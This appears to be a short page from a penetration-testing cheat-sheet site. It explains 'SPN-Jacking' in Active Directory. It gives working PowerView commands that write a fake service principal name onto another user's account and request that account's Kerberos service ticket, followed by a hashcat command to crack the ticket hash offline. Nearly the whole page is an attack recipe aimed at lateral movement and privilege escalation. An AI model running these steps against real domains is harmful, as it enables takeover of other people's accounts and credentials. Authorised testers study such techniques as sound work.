SPN-Jacking

If the current user has a right to write the SPN of another user, we can achieve lateral movement or privilege escalation.

Exploit

1. Set SPN and Get the Hash of the Service Ticket

# 1. Import PowerView module
. .\PowerView.ps1

# 2. Set SPN
Set-DomainObject -Identity <OTHER_USER> -SET @{serviceprincipalname='evil/evil'}

# 3. Request sercice ticket
Get-DomainSPNTicket -SPN evil/evil

2. Crack the Hash

After that, we retrieve the hash of the ticket, so crack it on your local machine:

# -m 13100: Replace it with the appropriate number depending on the algorithm.
hashcat -a 0 -m 13100 hash.txt wordlist.txt

References

The Hacker Recipes

PreviousWindows PrivEsc by Abusing SeBackupPrivilege NextSwitch User on Windows

Last updated 1 month ago